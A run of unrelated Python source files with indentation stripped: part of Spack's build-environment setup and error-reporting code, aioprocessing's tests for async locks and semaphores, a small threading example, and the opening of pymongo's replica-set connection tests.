# The top-level package is always RPATHed. It hasn't been installed yet
# so the RPATHs are added unconditionally (e.g. even though lib64/ may
# not be created for the install).
for libdir in ['lib', 'lib64']:
lib_path = os.path.join(pkg.prefix, libdir)
rpath_dirs.append(lib_path)
# Set up link, include, RPATH directories that are passed to the
# compiler wrapper
for dep in link_deps:
if is_system_path(dep.prefix):
continue
query = pkg.spec[dep.name]
dep_link_dirs = list()
try:
dep_link_dirs.extend(query.libs.directories)
except NoLibrariesError:
tty.debug("No libraries found for {0}".format(dep.name))
for default_lib_dir in ['lib', 'lib64']:
default_lib_prefix = os.path.join(dep.prefix, default_lib_dir)
if os.path.isdir(default_lib_prefix):
dep_link_dirs.append(default_lib_prefix)
link_dirs.extend(dep_link_dirs)
if dep in rpath_deps:
rpath_dirs.extend(dep_link_dirs)
try:
include_dirs.extend(query.headers.directories)
except NoHeadersError:
tty.debug("No headers found for {0}".format(dep.name))
link_dirs = list(dedupe(filter_system_paths(link_dirs)))
include_dirs = list(dedupe(filter_system_paths(include_dirs)))
rpath_dirs = list(dedupe(filter_system_paths(rpath_dirs)))
env.set(SPACK_LINK_DIRS, ':'.join(link_dirs))
env.set(SPACK_INCLUDE_DIRS, ':'.join(include_dirs))
env.set(SPACK_RPATH_DIRS, ':'.join(rpath_dirs))
build_prefixes = [dep.prefix for dep in build_deps]
build_link_prefixes = [dep.prefix for dep in build_link_deps]
# add run-time dependencies of direct build-time dependencies:
for build_dep in build_deps:
for run_dep in build_dep.traverse(deptype='run'):
build_prefixes.append(run_dep.prefix)
# Filter out system paths: ['/', '/usr', '/usr/local']
# These paths can be introduced into the build when an external package
# is added as a dependency. The problem with these paths is that they often
# contain hundreds of other packages installed in the same directory.
# If these paths come first, they can overshadow Spack installations.
build_prefixes = filter_system_paths(build_prefixes)
build_link_prefixes = filter_system_paths(build_link_prefixes)
# Add dependencies to CMAKE_PREFIX_PATH
env.set_path('CMAKE_PREFIX_PATH', build_link_prefixes)
# Set environment variables if specified for
# the given compiler
compiler = pkg.compiler
env.extend(spack.schema.environment.parse(compiler.environment))
if compiler.extra_rpaths:
extra_rpaths = ':'.join(compiler.extra_rpaths)
env.set('SPACK_COMPILER_EXTRA_RPATHS', extra_rpaths)
implicit_rpaths = compiler.implicit_rpaths()
if implicit_rpaths:
env.set('SPACK_COMPILER_IMPLICIT_RPATHS', ':'.join(implicit_rpaths))
# Add bin directories from dependencies to the PATH for the build.
for prefix in build_prefixes:
for dirname in ['bin', 'bin64']:
bin_dir = os.path.join(prefix, dirname)
if os.path.isdir(bin_dir):
env.prepend_path('PATH', bin_dir)
# Add spack build environment path with compiler wrappers first in
# the path. We add the compiler wrapper path, which includes default
# wrappers (cc, c++, f77, f90), AND a subdirectory containing
# compiler-specific symlinks. The latter ensures that builds that
# are sensitive to the *name* of the compiler see the right name when
# we're building with the wrappers.
#
# Conflicts on case-insensitive systems (like "CC" and "cc") are
# handled by putting one in the <build_env_path>/case-insensitive
# directory. Add that to the path too.
env_paths = []
compiler_specific = os.path.join(
spack.paths.build_env_path, pkg.compiler.name)
for item in [spack.paths.build_env_path, compiler_specific]:
env_paths.append(item)
ci = os.path.join(item, 'case-insensitive')
if os.path.isdir(ci):
env_paths.append(ci)
for item in env_paths:
env.prepend_path('PATH', item)
env.set_path(SPACK_ENV_PATH, env_paths)
# Working directory for the spack command itself, for debug logs.
if spack.config.get('config:debug'):
env.set(SPACK_DEBUG, 'TRUE')
env.set(SPACK_SHORT_SPEC, pkg.spec.short_spec)
env.set(SPACK_DEBUG_LOG_ID, pkg.spec.format('{name}-{hash:7}'))
env.set(SPACK_DEBUG_LOG_DIR, spack.main.spack_working_dir)
# Find ccache binary and hand it to build environment
if spack.config.get('config:ccache'):
ccache = Executable('ccache')
if not ccache:
raise RuntimeError("No ccache binary found in PATH")
env.set(SPACK_CCACHE_BINARY, ccache)
# Add any pkgconfig directories to PKG_CONFIG_PATH
for prefix in build_link_prefixes:
for directory in ('lib', 'lib64', 'share'):
pcdir = os.path.join(prefix, directory, 'pkgconfig')
if os.path.isdir(pcdir):
env.prepend_path('PKG_CONFIG_PATH', pcdir)
return env
def _set_variables_for_single_module(pkg, module):
"""Helper function to set module variables for single module."""
# Put a marker on this module so that it won't execute the body of this
# function again, since it is not needed
marker = '_set_run_already_called'
if getattr(module, marker, False):
return
jobs = spack.config.get('config:build_jobs', 16) if pkg.parallel else 1
jobs = min(jobs, multiprocessing.cpu_count())
assert jobs is not None, "no default set for config:build_jobs"
m = module
m.make_jobs = jobs
# TODO: make these build deps that can be installed if not found.
m.make = MakeExecutable('make', jobs)
m.gmake = MakeExecutable('gmake', jobs)
m.scons = MakeExecutable('scons', jobs)
m.ninja = MakeExecutable('ninja', jobs)
# easy shortcut to os.environ
m.env = os.environ
# Find the configure script in the archive path
# Don't use which for this; we want to find it in the current dir.
m.configure = Executable('./configure')
m.meson = Executable('meson')
m.cmake = Executable('cmake')
m.ctest = MakeExecutable('ctest', jobs)
# Standard CMake arguments
m.std_cmake_args = spack.build_systems.cmake.CMakePackage._std_args(pkg)
m.std_meson_args = spack.build_systems.meson.MesonPackage._std_args(pkg)
# Put spack compiler paths in module scope.
link_dir = spack.paths.build_env_path
m.spack_cc = os.path.join(link_dir, pkg.compiler.link_paths['cc'])
m.spack_cxx = os.path.join(link_dir, pkg.compiler.link_paths['cxx'])
m.spack_f77 = os.path.join(link_dir, pkg.compiler.link_paths['f77'])
m.spack_fc = os.path.join(link_dir, pkg.compiler.link_paths['fc'])
# Emulate some shell commands for convenience
m.pwd = os.getcwd
m.cd = os.chdir
m.mkdir = os.mkdir
m.makedirs = os.makedirs
m.remove = os.remove
m.removedirs = os.removedirs
m.symlink = os.symlink
m.mkdirp = mkdirp
m.install = install
m.install_tree = install_tree
m.rmtree = shutil.rmtree
m.move = shutil.move
# Useful directories within the prefix are encapsulated in
# a Prefix object.
m.prefix = pkg.prefix
# Platform-specific library suffix.
m.dso_suffix = dso_suffix
def static_to_shared_library(static_lib, shared_lib=None, **kwargs):
compiler_path = kwargs.get('compiler', m.spack_cc)
compiler = Executable(compiler_path)
return _static_to_shared_library(pkg.spec.architecture, compiler,
static_lib, shared_lib, **kwargs)
m.static_to_shared_library = static_to_shared_library
# Put a marker on this module so that it won't execute the body of this
# function again, since it is not needed
setattr(m, marker, True)
def set_module_variables_for_package(pkg):
"""Populate the module scope of install() with some useful functions.
This makes things easier for package writers.
"""
# If a user makes their own package repo, e.g.
# spack.pkg.mystuff.libelf.Libelf, and they inherit from an existing class
# like spack.pkg.original.libelf.Libelf, then set the module variables
# for both classes so the parent class can still use them if it gets
# called. parent_class_modules includes pkg.module.
modules = parent_class_modules(pkg.__class__)
for mod in modules:
_set_variables_for_single_module(pkg, mod)
def _static_to_shared_library(arch, compiler, static_lib, shared_lib=None,
**kwargs):
"""
Converts a static library to a shared library. The static library has to
be built with PIC for the conversion to work.
Parameters:
static_lib (str): Path to the static library.
shared_lib (str): Path to the shared library. Default is to derive
from the static library's path.
Keyword arguments:
compiler (str): Path to the compiler. Default is spack_cc.
compiler_output: Where to print compiler output to.
arguments (str list): Additional arguments for the compiler.
version (str): Library version. Default is unspecified.
compat_version (str): Library compatibility version. Default is
version.
"""
compiler_output = kwargs.get('compiler_output', None)
arguments = kwargs.get('arguments', [])
version = kwargs.get('version', None)
compat_version = kwargs.get('compat_version', version)
if not shared_lib:
shared_lib = '{0}.{1}'.format(os.path.splitext(static_lib)[0],
dso_suffix)
compiler_args = []
# TODO: Compiler arguments should not be hardcoded but provided by
# the different compiler classes.
if 'linux' in arch:
soname = os.path.basename(shared_lib)
if compat_version:
soname += '.{0}'.format(compat_version)
compiler_args = [
'-shared',
'-Wl,-soname,{0}'.format(soname),
'-Wl,--whole-archive',
static_lib,
'-Wl,--no-whole-archive'
]
elif 'darwin' in arch:
install_name = shared_lib
if compat_version:
install_name += '.{0}'.format(compat_version)
compiler_args = [
'-dynamiclib',
'-install_name', '{0}'.format(install_name),
'-Wl,-force_load,{0}'.format(static_lib)
]
if compat_version:
compiler_args.extend(['-compatibility_version', '{0}'.format(
compat_version)])
if version:
compiler_args.extend(['-current_version', '{0}'.format(version)])
if len(arguments) > 0:
compiler_args.extend(arguments)
shared_lib_base = shared_lib
if version:
shared_lib += '.{0}'.format(version)
elif compat_version:
shared_lib += '.{0}'.format(compat_version)
compiler_args.extend(['-o', shared_lib])
# Create symlinks for version and compat_version
shared_lib_link = os.path.basename(shared_lib)
if version or compat_version:
os.symlink(shared_lib_link, shared_lib_base)
if compat_version and compat_version != version:
os.symlink(shared_lib_link, '{0}.{1}'.format(shared_lib_base,
compat_version))
return compiler(*compiler_args, output=compiler_output)
def get_rpath_deps(pkg):
"""Return immediate or transitive RPATHs depending on the package."""
if pkg.transitive_rpaths:
return [d for d in pkg.spec.traverse(root=False, deptype=('link'))]
else:
return pkg.spec.dependencies(deptype='link')
def get_rpaths(pkg):
"""Get a list of all the rpaths for a package."""
rpaths = [pkg.prefix.lib, pkg.prefix.lib64]
deps = get_rpath_deps(pkg)
rpaths.extend(d.prefix.lib for d in deps
if os.path.isdir(d.prefix.lib))
rpaths.extend(d.prefix.lib64 for d in deps
if os.path.isdir(d.prefix.lib64))
# Second module is our compiler mod name. We use that to get rpaths from
# module show output.
if pkg.compiler.modules and len(pkg.compiler.modules) > 1:
rpaths.append(get_path_from_module(pkg.compiler.modules[1]))
return rpaths
def get_std_cmake_args(pkg):
"""List of standard arguments used if a package is a CMakePackage.
Returns:
list of str: standard arguments that would be used if this
package were a CMakePackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for cmake
"""
return spack.build_systems.cmake.CMakePackage._std_args(pkg)
def get_std_meson_args(pkg):
"""List of standard arguments used if a package is a MesonPackage.
Returns:
list of str: standard arguments that would be used if this
package were a MesonPackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for meson
"""
return spack.build_systems.meson.MesonPackage._std_args(pkg)
def parent_class_modules(cls):
"""
Get list of superclass modules that descend from spack.package.PackageBase
Includes cls.__module__
"""
if (not issubclass(cls, spack.package.PackageBase) or
issubclass(spack.package.PackageBase, cls)):
return []
result = []
module = sys.modules.get(cls.__module__)
if module:
result = [module]
for c in cls.__bases__:
result.extend(parent_class_modules(c))
return result
def load_external_modules(pkg):
"""Traverse a package's spec DAG and load any external modules.
Traverse a package's dependencies and load any external modules
associated with them.
Args:
pkg (PackageBase): package to load deps for
"""
for dep in list(pkg.spec.traverse()):
if dep.external_module:
load_module(dep.external_module)
def setup_package(pkg, dirty):
"""Execute all environment setup routines."""
build_env = EnvironmentModifications()
if not dirty:
clean_environment()
set_compiler_environment_variables(pkg, build_env)
set_build_environment_variables(pkg, build_env, dirty)
pkg.architecture.platform.setup_platform_environment(pkg, build_env)
build_env.extend(
modifications_from_dependencies(pkg.spec, context='build')
)
if (not dirty) and (not build_env.is_unset('CPATH')):
tty.debug("A dependency has updated CPATH, this may lead pkg-config"
" to assume that the package is part of the system"
" includes and omit it when invoked with '--cflags'.")
set_module_variables_for_package(pkg)
pkg.setup_build_environment(build_env)
# Loading modules, in particular if they are meant to be used outside
# of Spack, can change environment variables that are relevant to the
# build of packages. To avoid a polluted environment, preserve the
# value of a few, selected, environment variables
# With the current ordering of environment modifications, this is strictly
# unnecessary. Modules affecting these variables will be overwritten anyway
with preserve_environment('CC', 'CXX', 'FC', 'F77'):
# All module loads that otherwise would belong in previous
# functions have to occur after the build_env object has its
# modifications applied. Otherwise the environment modifications
# could undo module changes, such as unsetting LD_LIBRARY_PATH
# after a module changes it.
for mod in pkg.compiler.modules:
# Fixes issue https://github.com/spack/spack/issues/3153
if os.environ.get("CRAY_CPU_TARGET") == "mic-knl":
load_module("cce")
load_module(mod)
if pkg.architecture.target.module_name:
load_module(pkg.architecture.target.module_name)
load_external_modules(pkg)
# Make sure nothing's strange about the Spack environment.
validate(build_env, tty.warn)
build_env.apply_modifications()
def modifications_from_dependencies(spec, context):
"""Returns the environment modifications that are required by
the dependencies of a spec and also applies modifications
to this spec's package at module scope, if need be.
Args:
spec (Spec): spec for which we want the modifications
context (str): either 'build' for build-time modifications or 'run'
for run-time modifications
"""
env = EnvironmentModifications()
pkg = spec.package
# Maps the context to deptype and method to be called
deptype_and_method = {
'build': (('build', 'link', 'test'),
'setup_dependent_build_environment'),
'run': (('link', 'run'), 'setup_dependent_run_environment')
}
deptype, method = deptype_and_method[context]
for dspec in spec.traverse(order='post', root=False, deptype=deptype):
dpkg = dspec.package
set_module_variables_for_package(dpkg)
# Allow dependencies to modify the module
dpkg.setup_dependent_package(pkg.module, spec)
getattr(dpkg, method)(env, spec)
return env
def fork(pkg, function, dirty, fake):
"""Fork a child process to do part of a spack build.
Args:
pkg (PackageBase): package whose environment we should set up the
forked process for.
function (callable): argless function to run in the child
process.
dirty (bool): If True, do NOT clean the environment before
building.
fake (bool): If True, skip package setup b/c it's not a real build
Usage::
def child_fun():
# do stuff
build_env.fork(pkg, child_fun)
Forked processes are run with the build environment set up by
spack.build_environment. This allows package authors to have full
control over the environment, etc. without affecting other builds
that might be executed in the same spack call.
If something goes wrong, the child process catches the error and
passes it to the parent wrapped in a ChildError. The parent is
expected to handle (or re-raise) the ChildError.
"""
def child_process(child_pipe, input_stream):
# We are in the child process. Python sets sys.stdin to
# open(os.devnull) to prevent our process and its parent from
# simultaneously reading from the original stdin. But, we assume
# that the parent process is not going to read from it till we
# are done with the child, so we undo Python's precaution.
if input_stream is not None:
sys.stdin = input_stream
try:
if not fake:
setup_package(pkg, dirty=dirty)
return_value = function()
child_pipe.send(return_value)
except StopIteration as e:
# StopIteration is used to stop installations
# before the final stage, mainly for debug purposes
tty.msg(e)
child_pipe.send(None)
except BaseException:
# catch ANYTHING that goes wrong in the child process
exc_type, exc, tb = sys.exc_info()
# Need to unwind the traceback in the child because traceback
# objects can't be sent to the parent.
tb_string = traceback.format_exc()
# build up some context from the offending package so we can
# show that, too.
package_context = get_package_context(tb)
build_log = None
if hasattr(pkg, 'log_path'):
build_log = pkg.log_path
# make a pickleable exception to send to parent.
msg = "%s: %s" % (exc_type.__name__, str(exc))
ce = ChildError(msg,
exc_type.__module__,
exc_type.__name__,
tb_string, build_log, package_context)
child_pipe.send(ce)
finally:
child_pipe.close()
parent_pipe, child_pipe = multiprocessing.Pipe()
input_stream = None
try:
# Forward sys.stdin when appropriate, to allow toggling verbosity
if sys.stdin.isatty() and hasattr(sys.stdin, 'fileno'):
input_stream = os.fdopen(os.dup(sys.stdin.fileno()))
p = multiprocessing.Process(
target=child_process, args=(child_pipe, input_stream))
p.start()
except InstallError as e:
e.pkg = pkg
raise
finally:
# Close the input stream in the parent process
if input_stream is not None:
input_stream.close()
child_result = parent_pipe.recv()
p.join()
# let the caller know which package went wrong.
if isinstance(child_result, InstallError):
child_result.pkg = pkg
# If the child process raised an error, print its output here rather
# than waiting until the call to SpackError.die() in main(). This
# allows exception handling output to be logged from within Spack.
# see spack.main.SpackCommand.
if isinstance(child_result, ChildError):
child_result.print_context()
raise child_result
return child_result
def get_package_context(traceback, context=3):
"""Return some context for an error message when the build fails.
Args:
traceback (traceback): A traceback from some exception raised during
install
context (int): Lines of context to show before and after the line
where the error happened
This function inspects the stack to find where we failed in the
package file, and it adds detailed context to the long_message
from there.
"""
def make_stack(tb, stack=None):
"""Tracebacks come out of the system in caller -> callee order. Return
an array in callee -> caller order so we can traverse it."""
if stack is None:
stack = []
if tb is not None:
make_stack(tb.tb_next, stack)
stack.append(tb)
return stack
stack = make_stack(traceback)
for tb in stack:
frame = tb.tb_frame
if 'self' in frame.f_locals:
# Find the first proper subclass of PackageBase.
obj = frame.f_locals['self']
if isinstance(obj, spack.package.PackageBase):
break
# We found obj, the Package implementation we care about.
# Point out the location in the install method where we failed.
lines = [
'{0}:{1:d}, in {2}:'.format(
inspect.getfile(frame.f_code),
frame.f_lineno - 1, # subtract 1 because f_lineno is 0-indexed
frame.f_code.co_name
)
]
# Build a message showing context in the install method.
sourcelines, start = inspect.getsourcelines(frame)
# Calculate lineno of the error relative to the start of the function.
# Subtract 1 because f_lineno is 0-indexed.
fun_lineno = frame.f_lineno - start - 1
start_ctx = max(0, fun_lineno - context)
sourcelines = sourcelines[start_ctx:fun_lineno + context + 1]
for i, line in enumerate(sourcelines):
is_error = start_ctx + i == fun_lineno
mark = '>> ' if is_error else ' '
# Add start to get lineno relative to start of file, not function.
marked = ' {0}{1:-6d}{2}'.format(
mark, start + start_ctx + i, line.rstrip())
if is_error:
marked = colorize('@R{%s}' % cescape(marked))
lines.append(marked)
return lines
class InstallError(spack.error.SpackError):
"""Raised by packages when a package fails to install.
Any subclass of InstallError will be annotated by Spack wtih a
``pkg`` attribute on failure, which the caller can use to get the
package for which the exception was raised.
"""
class ChildError(InstallError):
"""Special exception class for wrapping exceptions from child processes
in Spack's build environment.
The main features of a ChildError are:
1. They're serializable, so when a child build fails, we can send one
of these to the parent and let the parent report what happened.
2. They have a ``traceback`` field containing a traceback generated
on the child immediately after failure. Spack will print this on
failure in lieu of trying to run sys.excepthook on the parent
process, so users will see the correct stack trace from a child.
3. They also contain context, which shows context in the Package
implementation where the error happened. This helps people debug
Python code in their packages. To get it, Spack searches the
stack trace for the deepest frame where ``self`` is in scope and
is an instance of PackageBase. This will generally find a useful
spot in the ``package.py`` file.
The long_message of a ChildError displays one of two things:
1. If the original error was a ProcessError, indicating a command
died during the build, we'll show context from the build log.
2. If the original error was any other type of error, we'll show
context from the Python code.
SpackError handles displaying the special traceback if we're in debug
mode with spack -d.
"""
# List of errors considered "build errors", for which we'll show log
# context instead of Python context.
build_errors = [('spack.util.executable', 'ProcessError')]
def __init__(self, msg, module, classname, traceback_string, build_log,
context):
super(ChildError, self).__init__(msg)
self.module = module
self.name = classname
self.traceback = traceback_string
self.build_log = build_log
self.context = context
@property
def long_message(self):
out = StringIO()
out.write(self._long_message if self._long_message else '')
if (self.module, self.name) in ChildError.build_errors:
# The error happened in some external executed process. Show
# the build log with errors or warnings highlighted.
if self.build_log and os.path.exists(self.build_log):
errors, warnings = parse_log_events(self.build_log)
nerr = len(errors)
nwar = len(warnings)
if nerr > 0:
# If errors are found, only display errors
out.write(
"\n%s found in build log:\n" % plural(nerr, 'error'))
out.write(make_log_context(errors))
elif nwar > 0:
# If no errors are found but warnings are, display warnings
out.write(
"\n%s found in build log:\n" % plural(nwar, 'warning'))
out.write(make_log_context(warnings))
else:
# The error happened in in the Python code, so try to show
# some context from the Package itself.
if self.context:
out.write('\n')
out.write('\n'.join(self.context))
out.write('\n')
if out.getvalue():
out.write('\n')
if self.build_log and os.path.exists(self.build_log):
out.write('See build log for details:\n')
out.write(' %s\n' % self.build_log)
return out.getvalue()
def __str__(self):
return self.message + self.long_message + self.traceback
def __reduce__(self):
"""__reduce__ is used to serialize (pickle) ChildErrors.
Return a function to reconstruct a ChildError, along with the
salient properties we'll need.
"""
return _make_child_error, (
self.message,
self.module,
self.name,
self.traceback,
self.build_log,
self.context)
def _make_child_error(msg, module, name, traceback, build_log, context):
"""Used by __reduce__ in ChildError to reconstruct pickled errors."""
return ChildError(msg, module, name, traceback, build_log, context)
|
lock_tests.py | import sys
import time
import asyncio
import unittest
import traceback
import aioprocessing
import aioprocessing.mp as multiprocessing
from aioprocessing.mp import Process, Event, Queue, get_all_start_methods
try:
from aioprocessing.mp import get_context
except ImportError:
def get_context(param):
pass
from ._base_test import BaseTest, _GenMixin
MANAGER_TYPE = 1
STANDARD_TYPE = 2
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
def do_lock_acquire(lock, e):
lock.acquire()
e.set()
time.sleep(2)
lock.release()
def sync_lock(lock, event, event2, queue):
event2.wait()
queue.put(lock.acquire(False))
event.set()
lock.acquire()
lock.release()
class GenAioLockTest(BaseTest, _GenMixin):
def setUp(self):
super().setUp()
self.Obj = aioprocessing.AioLock
self.inst = self.Obj()
self.meth = "coro_acquire"
class GenAioManagerLockTest(GenAioLockTest):
def setUp(self):
super().setUp()
self.manager = aioprocessing.AioManager()
self.Obj = self.manager.AioLock
self.inst = self.Obj()
@unittest.skipIf(
not hasattr(multiprocessing, "get_context"), "No get_context method"
)
def test_ctx(self):
pass
class GenAioRLockTest(BaseTest, _GenMixin):
def setUp(self):
super().setUp()
self.Obj = aioprocessing.AioRLock
self.inst = self.Obj()
self.meth = "coro_acquire"
class GenAioConditionTest(BaseTest, _GenMixin):
def setUp(self):
super().setUp()
self.Obj = aioprocessing.AioCondition
self.inst = self.Obj()
self.meth = "coro_acquire"
class GenAioSemaphoreTest(BaseTest, _GenMixin):
def setUp(self):
super().setUp()
self.Obj = aioprocessing.AioSemaphore
self.inst = self.Obj()
self.meth = "coro_acquire"
class GenAioEventTest(BaseTest, _GenMixin):
def setUp(self):
super().setUp()
self.Obj = aioprocessing.AioEvent
self.inst = self.Obj()
self.meth = "coro_wait"
def _after(self):
self.inst.set()
class GenAioBarrierTest(BaseTest, _GenMixin):
def setUp(self):
super().setUp()
self.Obj = aioprocessing.AioBarrier
self.inst = self.Obj(1)
self.initargs = (1,)
self.meth = "coro_wait"
class LoopLockTest(BaseTest):
def setUp(self):
pass
def test_lock_with_loop(self):
loop = asyncio.new_event_loop()
lock = aioprocessing.AioLock()
async def do_async_lock():
await lock.coro_acquire(loop=loop)
loop.run_until_complete(do_async_lock())
class LockTest(BaseTest):
def setUp(self):
super().setUp()
self.type_ = STANDARD_TYPE
self.lock = aioprocessing.AioLock()
def test_lock(self):
self.assertEqual(True, self.lock.acquire())
self.assertEqual(False, self.lock.acquire(False))
self.assertEqual(None, self.lock.release())
def test_lock_async(self):
async def do_async_lock():
self.assertEqual(True, (await self.lock.coro_acquire()))
self.assertEqual(None, self.lock.release())
self.loop.run_until_complete(do_async_lock())
def test_lock_cm(self):
event = Event()
event2 = Event()
q = Queue()
async def with_lock():
async with self.lock:
event2.set()
await asyncio.sleep(1)
event.wait()
p = Process(target=sync_lock, args=(self.lock, event, event2, q))
p.start()
self.loop.run_until_complete(with_lock())
p.join()
self.assertFalse(q.get())
def test_lock_multiproc(self):
e = Event()
async def do_async_lock():
self.assertEqual(False, (await self.lock.coro_acquire(False)))
self.assertEqual(
True, (await self.lock.coro_acquire(timeout=4))
)
p = Process(target=do_lock_acquire, args=(self.lock, e))
p.start()
e.wait()
self.loop.run_until_complete(do_async_lock())
class LockManagerTest(LockTest):
def setUp(self):
super().setUp()
self.type_ = MANAGER_TYPE
self.manager = aioprocessing.AioManager()
self.lock = self.manager.AioLock()
def tearDown(self):
super().tearDown()
self.manager.shutdown()
self.manager.join()
class RLockTest(LockTest):
def setUp(self):
super().setUp()
self.lock = aioprocessing.AioRLock()
def test_lock(self):
self.assertEqual(True, self.lock.acquire())
self.assertEqual(True, self.lock.acquire(False))
self.assertEqual(None, self.lock.release())
class RLockManagerTest(RLockTest):
def setUp(self):
super().setUp()
self.type_ = MANAGER_TYPE
self.manager = aioprocessing.AioManager()
self.lock = self.manager.AioRLock()
def tearDown(self):
super().tearDown()
self.manager.shutdown()
self.manager.join()
def mix_release(lock, q):
try:
try:
lock.release()
except (ValueError, AssertionError):
pass
else:
q.put("Didn't get excepted AssertionError")
lock.acquire()
lock.release()
q.put(True)
except Exception:
exc = traceback.format_exception(*sys.exc_info())
q.put(exc)
class LockMixingTest(BaseTest):
def setUp(self):
super().setUp()
self.lock = aioprocessing.AioRLock()
def test_sync_lock(self):
self.lock.acquire()
self.lock.release()
def test_mix_async_to_sync(self):
async def do_acquire():
await self.lock.coro_acquire()
self.loop.run_until_complete(do_acquire())
self.lock.release()
def test_mix_with_procs(self):
async def do_acquire():
await self.lock.coro_acquire()
q = Queue()
p = Process(target=mix_release, args=(self.lock, q))
self.loop.run_until_complete(do_acquire())
p.start()
self.lock.release()
out = q.get(timeout=5)
p.join()
self.assertTrue(isinstance(out, bool))
class SpawnLockMixingTest(LockMixingTest):
def setUp(self):
super().setUp()
context = get_context("spawn")
self.lock = aioprocessing.AioLock(context=context)
if "forkserver" in get_all_start_methods():
class ForkServerLockMixingTest(LockMixingTest):
def setUp(self):
super().setUp()
context = get_context("forkserver")
self.lock = aioprocessing.AioLock(context=context)
class SemaphoreTest(BaseTest):
def setUp(self):
super().setUp()
self.sem = aioprocessing.AioSemaphore(2)
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(True, sem.acquire())
self.assertReturnsIfImplemented(1, get_value, sem)
async def sem_acquire():
self.assertEqual(True, (await sem.coro_acquire()))
self.loop.run_until_complete(sem_acquire())
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(False, sem.acquire(False))
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(None, sem.release())
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(None, sem.release())
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.sem
self._test_semaphore(sem)
self.assertEqual(None, sem.release())
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(None, sem.release())
self.assertReturnsIfImplemented(4, get_value, sem)
class BoundedSemaphoreTest(SemaphoreTest):
def setUp(self):
super().setUp()
self.sem = aioprocessing.AioBoundedSemaphore(2)
def test_semaphore(self):
self._test_semaphore(self.sem)
def barrier_wait(barrier, event):
event.set()
barrier.wait()
class BarrierTest(BaseTest):
def setUp(self):
super().setUp()
self.barrier = aioprocessing.AioBarrier(2)
def _wait_barrier(self):
self.barrier.wait()
def test_barrier(self):
fut = None
async def wait_barrier_async():
await self.barrier.coro_wait()
async def wait_barrier():
nonlocal fut
fut = asyncio.ensure_future(wait_barrier_async())
await asyncio.sleep(0.5)
self.assertEqual(1, self.barrier.n_waiting)
self.barrier.wait()
# t = threading.Thread(target=self._wait_barrier)
# t.start()
self.loop.run_until_complete(wait_barrier())
self.loop.run_until_complete(fut)
def test_barrier_multiproc(self):
event = Event()
p = Process(target=barrier_wait, args=(self.barrier, event))
p.start()
async def wait_barrier():
event.wait()
await asyncio.sleep(0.2)
self.assertEqual(1, self.barrier.n_waiting)
await self.barrier.coro_wait()
self.loop.run_until_complete(wait_barrier())
p.join()
def set_event(event):
event.set()
class EventTest(BaseTest):
def setUp(self):
super().setUp()
self.event = aioprocessing.AioEvent()
def test_event(self):
p = Process(target=set_event, args=(self.event,))
async def wait_event():
await self.event.coro_wait()
p.start()
self.loop.run_until_complete(wait_event())
p.join()
def cond_notify(cond, event):
time.sleep(2)
event.set()
cond.acquire()
cond.notify_all()
cond.release()
class ConditionTest(BaseTest):
def setUp(self):
super().setUp()
self.cond = aioprocessing.AioCondition()
def test_cond(self):
event = Event()
def pred():
return event.is_set()
async def wait_for_pred():
await self.cond.coro_acquire()
await self.cond.coro_wait_for(pred)
self.cond.release()
p = Process(target=cond_notify, args=(self.cond, event))
p.start()
self.loop.run_until_complete(wait_for_pred())
p.join()
if __name__ == "__main__":
unittest.main()
|
04.py | import time
import threading
def test():
time.sleep(5)
for i in range(1, 10):
print(i)
thread1 = threading.Thread(target=test)
thread1.start()
thread1.join()
print('主线程完成了')
|
test_replica_set_connection.py | # Copyright 2011-2012 10gen, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the replica_set_connection module."""
import copy
import datetime
import os
import signal
import socket
import sys
import time
import thread
import traceback
import unittest
sys.path[0:0] = [""]
from nose.plugins.skip import SkipTest
from bson.son import SON
from bson.tz_util import utc
from pymongo.connection import Connection
from pymongo.read_preferences import ReadPreference
from pymongo.replica_set_connection import ReplicaSetConnection
from pymongo.replica_set_connection import _partition_node
from pymongo.database import Database
from pymongo.errors import (AutoReconnect,
ConfigurationError,
ConnectionFailure,
InvalidName,
OperationFailure)
from test import version
from test.utils import delay, assertReadFrom, assertReadFromAll, read_from_which_host
host = os.environ.get("DB_IP", 'localhost')
port = int(os.environ.get("DB_PORT", 27017))
pair = '%s:%d' % (host, port)
class TestReplicaSetConnectionAgainstStandalone(unittest.TestCase):
"""This is a funny beast -- we want to run tests for ReplicaSetConnection
but only if the database at DB_IP and DB_PORT is a standalone.
"""
def setUp(self):
conn = Connection(pair)
response = conn.admin.command('ismaster')
if 'setName' in response:
raise SkipTest("Connected to a replica set, not a standalone mongod")
def test_connect(self):
self.assertRaises(ConfigurationError, ReplicaSetConnection,
pair, replicaSet='anything',
connectTimeoutMS=600)
class TestConnectionReplicaSetBase(unittest.TestCase):
def setUp(self):
conn = Connection(pair)
response = conn.admin.command('ismaster')
if 'setName' in response:
self.name = str(response['setName'])
self.w = len(response['hosts'])
self.hosts = set([_partition_node(h)
for h in response["hosts"]])
self.arbiters = set([_partition_node(h)
for h in response.get("arbiters", [])])
repl_set_status = conn.admin.command('replSetGetStatus')
primary_info = [
m for m in repl_set_status['members']
if m['stateStr'] == 'PRIMARY'
][0]
self.primary = _partition_node(primary_info['name'])
self.secondaries = [
_partition_node(m['name']) for m in repl_set_status['members']
if m['stateStr'] == 'SECONDARY'
]
else:
raise SkipTest("Not connected to a replica set")
def _get_connection(self, **kwargs):
return ReplicaSetConnection(pair,
replicaSet=self.name,
**kwargs)
class TestConnection(TestConnectionReplicaSetBase):
def test_connect(self):
self.assertRaises(ConnectionFailure, ReplicaSetConnection,
"somedomainthatdoesntexist.org:27017",
replicaSet=self.name,
connectTimeoutMS=600)
